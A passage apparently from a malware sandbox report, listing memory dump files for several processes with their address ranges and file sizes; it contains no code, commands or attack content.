                                                                                                                                                                                                                                                                                                                      • memory/2516-22-0x0000000002320000-0x0000000002328000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2516-20-0x0000000002570000-0x00000000025F0000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        512KB

                                                                                                                                                                                                                                                                                                                      • memory/2516-21-0x000000001B2D0000-0x000000001B5B2000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        2.9MB

                                                                                                                                                                                                                                                                                                                      • memory/2532-2805-0x0000000000E90000-0x00000000014FE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                                                                                                                      • memory/2588-17-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-14-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-12-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-18-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-19-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-10-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-16-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        4KB

                                                                                                                                                                                                                                                                                                                      • memory/2588-8-0x0000000000400000-0x0000000000408000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        32KB

                                                                                                                                                                                                                                                                                                                      • memory/2748-2804-0x0000000001050000-0x00000000016BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                                                                                                                      • memory/2748-2026-0x0000000001050000-0x00000000016BE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                                                                                                                      • memory/2760-1973-0x0000000001F90000-0x00000000025FE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.4MB

                                                                                                                                                                                                                                                                                                                      • memory/2760-399-0x0000000001F90000-0x00000000025FE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.4MB